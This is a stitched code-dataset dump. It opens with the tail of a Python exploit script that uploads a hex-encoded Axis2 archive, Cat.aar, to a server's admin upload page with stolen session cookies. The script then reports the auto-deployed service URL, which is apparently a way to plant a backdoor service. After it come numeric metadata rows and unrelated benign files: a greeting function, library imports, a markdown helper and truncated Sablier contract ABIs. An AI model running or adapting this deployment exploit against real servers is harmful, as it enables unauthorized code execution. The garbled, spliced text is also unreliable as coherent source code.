8\xB3\xDB\x76\x9B\xF0\x51\x0C\xEF\xD7\x2C\xAD\xE0\x6E\x84\x87\x33\x1C\x4B\x47\x8F\x67\xB8\xA5\x2F\x70\x0B\x77\x4A\xB1\x11\xB9\x8C\x90\x4A\x94\xF3\x18\x9F\xE7\x8E\xBB\x85\xA4\xDB\x32\x8D\x85\x3F\x49\x5B\x59\xF8\xDD\xA0\xAD\x7E\x00\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x00\x00\xFB\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\xED\x41\x00\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x45\x93\x1C\x16\x5A\x00\x00\x00\x67\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\x2B\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x00\x00\xFA\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xED\x41\xB7\x00\x00\x00\x6C\x69\x62\x2F\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x59\x1F\x55\xA8\xA1\x0C\x00\x00\xD7\x19\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xD9\x00\x00\x00\x43\x61\x74\x2E\x63\x6C\x61\x73\x73\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x23\xFC\x37\xC9\xDA\x00\x00\x00\xC5\x01\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xA1\x0D\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x73\x65\x72\x76\x69\x63\x65\x73\x2E\x78\x6D\x6C\x50\x4B\x05\x06\x00\x00\x00\x00\x05\x00\x05\x00\x29\x01\x00\x00\xAE\x0E\x00\x00\x00\x00"
data.append('--%s' % boundary)
data.append('Content-Disposition: form-data; name="filename"; filename="Cat.aar"')
data.append('Content-Type: application/octet-stream\r\n')
data.append(aar_file)
data.append('--%s--\r\n' % boundary)
http_body = '\r\n'.join(data)
try:
req = urllib2.Request(upload_url, data=http_body)
req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0')
req.add_header('Referer',upload_url)
req.add_header('Cookie',cookies)
req.add_header('Content-Length',len(http_body))
res_html = urllib2.urlopen(req, timeout=timeout).read()
if "File Cat.aar successfully uploaded" in res_html:
return " Auto deploy success:http://%s:%s/axis2/services/Cat?wsdl"%(host,port)
except Exception,e:
return 'NO'
| 650.333333
| 16,326
| 0.740817
| 4,246
| 17,559
| 3.060057
| 0.080546
| 0.067883
| 0.067883
| 0.067421
| 0.117987
| 0.117987
| 0.117987
| 0.117987
| 0.117987
| 0.115216
| 0
| 0.317127
| 0.013725
| 17,559
| 27
| 16,327
| 650.333333
| 0.433133
| 0.001936
| 0
| 0
| 0
| 0.08
| 0.957824
| 0.937421
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.04
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d7345af0218e03741a6ce2c19832a96117f3f243
| 39
|
py
|
Python
|
module_folder/module_file.py
|
nheske/learn-python
|
0f430ffa232103419669cec78202e9f2e74f7f6c
|
[
"MIT"
] | null | null | null |
module_folder/module_file.py
|
nheske/learn-python
|
0f430ffa232103419669cec78202e9f2e74f7f6c
|
[
"MIT"
] | null | null | null |
module_folder/module_file.py
|
nheske/learn-python
|
0f430ffa232103419669cec78202e9f2e74f7f6c
|
[
"MIT"
] | null | null | null |
def say_hello():
return "hello"
| 6.5
| 18
| 0.589744
| 5
| 39
| 4.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.282051
| 39
| 5
| 19
| 7.8
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d743f6a84de8e5caf4339038ccd9b7e5257b2938
| 145
|
py
|
Python
|
easycodef/errors/__init__.py
|
fiveio/easy-codef-py
|
97bd6831909e4d31af0ec7ed479b63fc977cd302
|
[
"MIT"
] | 1
|
2019-09-17T00:47:08.000Z
|
2019-09-17T00:47:08.000Z
|
easycodef/errors/__init__.py
|
fiveio/easy-codef-py
|
97bd6831909e4d31af0ec7ed479b63fc977cd302
|
[
"MIT"
] | null | null | null |
easycodef/errors/__init__.py
|
fiveio/easy-codef-py
|
97bd6831909e4d31af0ec7ed479b63fc977cd302
|
[
"MIT"
] | null | null | null |
from ._errors import Error
from ._errors import TokenGenerateError
from ._errors import ConnectedIdGenerateError
from ._errors import UseApiError
| 36.25
| 45
| 0.868966
| 16
| 145
| 7.625
| 0.4375
| 0.327869
| 0.52459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 145
| 4
| 46
| 36.25
| 0.938462
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ad16b6d8d14f4c70e7a7bb64095f062101bb1263
| 132
|
py
|
Python
|
bot/util/syntax.py
|
VoxelPrismatic/prizai
|
632a5dfed23807d78064d292d474ac4cc8988b12
|
[
"Unlicense"
] | 2
|
2019-11-08T21:34:44.000Z
|
2020-07-05T15:31:19.000Z
|
bot/util/syntax.py
|
VoxelPrismatic/prizai
|
632a5dfed23807d78064d292d474ac4cc8988b12
|
[
"Unlicense"
] | null | null | null |
bot/util/syntax.py
|
VoxelPrismatic/prizai
|
632a5dfed23807d78064d292d474ac4cc8988b12
|
[
"Unlicense"
] | 2
|
2020-07-05T15:39:51.000Z
|
2020-07-05T16:15:47.000Z
|
def code(st, syntax = ""): return f"```{syntax}\n{st}```"
def md(st): return code(st, "md")
def diff(st): return code(st, "diff")
| 22
| 57
| 0.583333
| 23
| 132
| 3.347826
| 0.391304
| 0.233766
| 0.311688
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143939
| 132
| 5
| 58
| 26.4
| 0.681416
| 0
| 0
| 0
| 0
| 0
| 0.19697
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| false
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
ad18cc97c93d139215618d0ef2b30ddb182997b3
| 22,964
|
py
|
Python
|
safe_transaction_service/contracts/decoder_abis/sablier.py
|
kanhirun/safe-transaction-service
|
9bd6103be7d77469a337b6f02c8e0693e7951e4c
|
[
"MIT"
] | 5
|
2021-01-28T17:41:42.000Z
|
2021-11-14T17:09:18.000Z
|
safe_transaction_service/contracts/decoder_abis/sablier.py
|
kanhirun/safe-transaction-service
|
9bd6103be7d77469a337b6f02c8e0693e7951e4c
|
[
"MIT"
] | 8
|
2022-03-15T18:39:45.000Z
|
2022-03-28T01:28:13.000Z
|
safe_transaction_service/contracts/decoder_abis/sablier.py
|
kanhirun/safe-transaction-service
|
9bd6103be7d77469a337b6f02c8e0693e7951e4c
|
[
"MIT"
] | 5
|
2021-04-06T17:20:02.000Z
|
2022-01-13T10:58:08.000Z
|
sablier_ctoken_manager = [{'constant': True, 'inputs': [], 'name': 'owner', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'isOwner', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'transferOwnership', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'inputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'constructor'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'previousOwner', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'OwnershipTransferred', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'DiscardCToken', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'WhitelistCToken', 'type': 'event'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'whitelistCToken', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'discardCToken', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'isCToken', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}]
sablier_payroll = [{'constant': True, 'inputs': [{'internalType': 'address', 'name': '', 'type': 'address'}, {'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'name': 'relayers', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'sablier', 'outputs': [{'internalType': 'contract Sablier', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'getHubAddr', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'bytes', 'name': 'context', 'type': 'bytes'}], 'name': 'preRelayedCall', 'outputs': [{'internalType': 'bytes32', 'name': '', 'type': 'bytes32'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'owner', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'isOwner', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'relayHubVersion', 'outputs': [{'internalType': 'string', 'name': '', 'type': 'string'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'nextSalaryId', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'bytes', 'name': 'context', 'type': 'bytes'}, {'internalType': 'bool', 'name': 'success', 'type': 'bool'}, {'internalType': 'uint256', 'name': 'actualCharge', 'type': 'uint256'}, {'internalType': 'bytes32', 'name': 'preRetVal', 'type': 'bytes32'}], 'name': 'postRelayedCall', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'transferOwnership', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'company', 'type': 'address'}], 'name': 'CreateSalary', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'company', 'type': 'address'}], 'name': 'WithdrawFromSalary', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'company', 'type': 'address'}], 'name': 'CancelSalary', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'oldRelayHub', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newRelayHub', 'type': 'address'}], 'name': 'RelayHubChanged', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'previousOwner', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'OwnershipTransferred', 'type': 'event'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'trustedSigner', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'ownerAddress', 'type': 'address'}, {'internalType': 'address', 'name': 'signerAddress', 'type': 'address'}, {'internalType': 'address', 'name': 'sablierAddress', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'relayer', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'whitelistRelayer', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'relayer', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'discardRelayer', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'relay', 'type': 'address'}, {'internalType': 'address', 'name': 'from', 'type': 'address'}, {'internalType': 'bytes', 'name': 'encodedFunction', 'type': 'bytes'}, {'internalType': 'uint256', 'name': 'transactionFee', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'gasPrice', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'gasLimit', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'nonce', 'type': 'uint256'}, {'internalType': 'bytes', 'name': 'approvalData', 'type': 'bytes'}, {'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'name': 'acceptRelayedCall', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}, {'internalType': 'bytes', 'name': '', 'type': 'bytes'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'getSalary', 'outputs': [{'internalType': 'address', 'name': 'company', 'type': 'address'}, {'internalType': 'address', 'name': 'employee', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salary', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'remainingBalance', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'rate', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'employee', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salary', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}], 'name': 'createSalary', 'outputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'employee', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salary', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'name': 'createCompoundingSalary', 'outputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'withdrawFromSalary', 'outputs': [{'internalType': 'bool', 'name': 'success', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'cancelSalary', 'outputs': [{'internalType': 'bool', 'name': 'success', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}]
sablier_abi = [{'constant': True, 'inputs': [], 'name': 'nextStreamId', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'unpause', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'isPauser', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'paused', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'addPauser', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'pause', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'owner', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'isOwner', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'cTokenManager', 'outputs': [{'internalType': 'contract ICTokenManager', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'fee', 'outputs': [{'internalType': 'uint256', 'name': 'mantissa', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'transferOwnership', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'inputs': [{'internalType': 'address', 'name': 'cTokenManagerAddress', 'type': 'address'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'constructor'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'exchangeRate', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'name': 'CreateCompoundingStream', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'senderInterest', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'recipientInterest', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'sablierInterest', 'type': 'uint256'}], 'name': 'PayInterest', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'indexed': True, 'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'TakeEarnings', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'fee', 'type': 'uint256'}], 'name': 'UpdateFee', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': False, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'Paused', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': False, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'Unpaused', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'PauserAdded', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'PauserRemoved', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'previousOwner', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'OwnershipTransferred', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'indexed': False, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}], 'name': 'CreateStream', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'WithdrawFromStream', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'senderBalance', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'recipientBalance', 'type': 'uint256'}], 'name': 'CancelStream', 'type': 'event'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'feePercentage', 'type': 'uint256'}], 'name': 'updateFee', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'takeEarnings', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'getStream', 'outputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'remainingBalance', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'ratePerSecond', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'deltaOf', 'outputs': [{'internalType': 'uint256', 'name': 'delta', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'internalType': 'address', 'name': 'who', 'type': 'address'}], 'name': 'balanceOf', 'outputs': [{'internalType': 'uint256', 'name': 'balance', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'isCompoundingStream', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'getCompoundingStream', 'outputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'remainingBalance', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'ratePerSecond', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'exchangeRateInitial', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'interestOf', 'outputs': [{'internalType': 'uint256', 'name': 'senderInterest', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientInterest', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'sablierInterest', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'getEarnings', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}], 'name': 'createStream', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'recipient', 'type': 'address'}, 